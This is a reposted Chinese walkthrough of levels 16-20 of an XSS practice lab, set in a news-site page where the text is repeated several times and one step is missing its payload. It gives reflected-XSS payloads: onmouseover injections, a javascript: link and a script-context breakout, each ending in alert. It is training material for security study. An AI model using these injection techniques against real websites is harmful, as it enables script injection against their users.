欢迎来到尧图网

您的位置：首页 > 新闻 > 国际 > xxs靶场16-20关

xxs靶场16-20关

2025/3/20 4:10:30 来源：https://blog.csdn.net/2301_78031880/article/details/141647057 浏览: 次关键词：xxs靶场16-20关

十六.

1.进入关卡按f12

2.把下面语句插入里面

十七.

1.查看一下网络源码

2.传入的两个参数`arg01`和`arg02`，出现在了嵌入的`src`属性中，那我们再`arg02`处给这个嵌入的标签注册一个事件弹窗即可。

?arg01=a&arg02=%27%20οnmοuseοver=alert("aini")

十八.

1.?arg01=a&arg02=b%20οnmοuseοver=alert(1)

十九

1. 页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>，点击xss

二十.

1.php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

xxs靶场16-20关

十六.

1.进入关卡按f12

2.把下面语句插入里面

十七.

1.查看一下网络源码

2.传入的两个参数`arg01`和`arg02`，出现在了嵌入的`src`属性中，那我们再`arg02`处给这个嵌入的标签注册一个事件弹窗即可。

十八.

1.?arg01=a&arg02=b%20οnmοuseοver=alert(1)

十九

1.

页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>，点击xss

二十.

1.php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

xxs靶场16-20关

十六.

1.进入关卡按f12

2.把下面语句插入里面

十七.

1.查看一下网络源码

2.传入的两个参数arg01和arg02，出现在了嵌入的src属性中，那我们再arg02处给这个嵌入的标签注册一个事件弹窗即可。

十八.

1.?arg01=a&arg02=b%20οnmοuseοver=alert(1)

十九

1.

页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>，点击xss

二十.

1.php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

2.传入的两个参数`arg01`和`arg02`，出现在了嵌入的`src`属性中，那我们再`arg02`处给这个嵌入的标签注册一个事件弹窗即可。